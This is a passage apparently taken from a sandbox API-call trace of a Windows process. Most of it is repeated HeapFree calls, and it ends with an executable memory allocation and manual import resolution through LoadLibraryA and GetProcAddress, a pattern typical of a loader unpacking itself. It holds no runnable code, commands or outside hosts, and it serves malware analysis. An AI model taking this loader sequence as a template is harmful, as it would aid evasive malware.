dwFlags=0x0, lpMem=0x23de410 | out: hHeap=0x4a0000) returned 1 [0183.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23f1620 | out: hHeap=0x4a0000) returned 1 [0183.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2404830 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2417a40 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x242ac50 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x243de60 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2451070 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2464280 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2477490 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x248a6a0 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x249d8b0 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24b0ac0 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24c3cd0 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24d6ee0 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24ea0f0 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24fd300 | out: hHeap=0x4a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2510510 | out: hHeap=0x4a0000) returned 1 [0183.978] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2523720 | out: hHeap=0x4a0000) returned 1 [0183.978] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2536930 | out: hHeap=0x4a0000) returned 1 [0183.979] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2549b40 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x255cd50 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x256ff60 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2583170 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2596380 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25a9590 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25bc7a0 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25cf9b0 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25e2bc0 | out: hHeap=0x4a0000) returned 1 [0183.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2600080 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2613290 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26264a0 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26396b0 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x264c8c0 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x265fad0 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2672ce0 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2685ef0 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2699100 | out: hHeap=0x4a0000) returned 1 [0183.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26ac310 | out: hHeap=0x4a0000) returned 1 [0183.990] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26bf520 | out: hHeap=0x4a0000) returned 1 [0183.992] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26d2730 | out: hHeap=0x4a0000) returned 1 [0183.992] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26e5940 | out: hHeap=0x4a0000) returned 1 [0183.992] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26f8b50 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x270bd60 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x271ef70 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2732180 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2745390 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27585a0 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x276b7b0 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x277e9c0 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2791bd0 | out: hHeap=0x4a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27a4de0 | out: hHeap=0x4a0000) returned 1 [0183.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27b7ff0 | out: hHeap=0x4a0000) returned 1 [0183.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27cb200 | out: hHeap=0x4a0000) returned 1 [0183.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27de410 | out: hHeap=0x4a0000) returned 1 [0183.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27f1620 | out: hHeap=0x4a0000) returned 1 [0183.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2804830 | out: hHeap=0x4a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2817a40 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x282ac50 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x283de60 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2851070 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2864280 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2877490 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x288a6a0 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x289d8b0 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28b0ac0 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28c3cd0 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28d6ee0 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28ea0f0 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28fd300 | out: hHeap=0x4a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2910510 | out: hHeap=0x4a0000) returned 1 [0184.010] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2923720 | out: hHeap=0x4a0000) returned 1 [0184.010] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2936930 | out: hHeap=0x4a0000) returned 1 [0184.010] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2949b40 | out: hHeap=0x4a0000) returned 1 [0184.010] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x295cd50 | out: hHeap=0x4a0000) returned 1 [0184.012] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x296ff60 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2983170 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2996380 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29a9590 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29bc7a0 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29cf9b0 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29e2bc0 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29f5dd0 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a08fe0 | out: hHeap=0x4a0000) returned 1 [0184.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a1c1f0 | out: hHeap=0x4a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a2f400 | out: hHeap=0x4a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a42610 | out: hHeap=0x4a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a55820 | out: hHeap=0x4a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a68a30 | out: hHeap=0x4a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a7bc40 | out: hHeap=0x4a0000) returned 1 [0184.255] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a8ee50 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2aa2060 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ab5270 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ac8480 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2adb690 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2aee8a0 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b01ab0 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b14cc0 | out: hHeap=0x4a0000) returned 1 [0184.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b27ed0 | out: hHeap=0x4a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b3b0e0 | out: hHeap=0x4a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b4e2f0 | out: hHeap=0x4a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b61500 | out: hHeap=0x4a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b74710 | out: hHeap=0x4a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b87920 | out: hHeap=0x4a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b9ab30 | out: hHeap=0x4a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2badd40 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bc0f50 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bd4160 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2be7370 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bfa580 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c0d790 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c209a0 | out: hHeap=0x4a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c33bb0 | out: hHeap=0x4a0000) returned 1 [0184.267] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c46dc0 | out: hHeap=0x4a0000) returned 1 [0184.267] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c59fd0 | out: hHeap=0x4a0000) returned 1 [0184.267] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c6d1e0 | out: hHeap=0x4a0000) returned 1 [0184.267] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c803f0 | out: hHeap=0x4a0000) returned 1 [0184.267] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x4a0000) returned 1 [0184.267] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ca6810 | out: hHeap=0x4a0000) returned 1 [0184.270] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cb9a20 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cccc30 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cdfe40 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cf3050 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d06260 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d19470 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d2c680 | out: hHeap=0x4a0000) returned 1 [0184.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d3f890 | out: hHeap=0x4a0000) returned 1 [0184.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d52aa0 | out: hHeap=0x4a0000) returned 1 [0184.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d65cb0 | out: hHeap=0x4a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d78ec0 | out: hHeap=0x4a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d8c0d0 | out: hHeap=0x4a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d9f2e0 | out: hHeap=0x4a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2db24f0 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2dc5700 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2dd8910 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e00080 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e13290 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e264a0 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e396b0 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e4c8c0 | out: hHeap=0x4a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e5fad0 | out: hHeap=0x4a0000) returned 1 [0184.279] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e72ce0 | out: hHeap=0x4a0000) returned 1 [0184.279] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e85ef0 | out: hHeap=0x4a0000) returned 1 [0184.279] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e99100 | out: hHeap=0x4a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2eac310 | out: hHeap=0x4a0000) returned 1 [0184.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ebf520 | out: hHeap=0x4a0000) returned 1 [0184.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ed2730 | out: hHeap=0x4a0000) returned 1 [0184.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ee5940 | out: hHeap=0x4a0000) returned 1 [0184.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ef8b50 | out: hHeap=0x4a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f0bd60 | out: hHeap=0x4a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f1ef70 | out: hHeap=0x4a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f32180 | out: hHeap=0x4a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f45390 | out: hHeap=0x4a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f585a0 | out: hHeap=0x4a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f6b7b0 | out: hHeap=0x4a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f7e9c0 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f91bd0 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fa4de0 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fb7ff0 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fcb200 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fde410 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ff1620 | out: hHeap=0x4a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3004830 | out: hHeap=0x4a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3017a40 | out: hHeap=0x4a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x302ac50 | out: hHeap=0x4a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x303de60 | out: hHeap=0x4a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3051070 | out: hHeap=0x4a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3064280 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3077490 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x308a6a0 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x309d8b0 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30b0ac0 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30c3cd0 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30d6ee0 | out: hHeap=0x4a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30ea0f0 | out: hHeap=0x4a0000) returned 1 [0184.499] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30fd300 | out: hHeap=0x4a0000) returned 1 [0184.502] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3110510 | out: hHeap=0x4a0000) returned 1 [0184.505] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3123720 | out: hHeap=0x4a0000) returned 1 [0185.559] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0185.564] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0185.564] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0185.565] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0185.565] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0185.565] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0185.565] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0185.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0185.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0185.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0185.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0185.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0185.567] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0185.567] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0185.568] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0185.568] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0185.568] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0185.568] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0185.568] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0185.568] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0185.568] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0185.568] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cdb40 | out: hHeap=0x4a0000) returned 1 [0185.569] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0185.574] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b01d0 | out: hHeap=0x4a0000) returned 1 [0185.577] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0185.577] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0185.577] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0185.577] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0185.577] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0185.577] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0185.580] GetProcessHeap () returned 0x4a0000 [0185.580] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x68) returned 0x4a8d80 [0185.581] GetProcessHeap () returned 0x4a0000 [0185.581] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9080 [0185.582] GetProcessHeap () returned 0x4a0000 [0185.582] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x48) returned 0x4b0310 [0185.582] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0185.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0185.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0185.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0185.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0185.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0185.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0185.764] 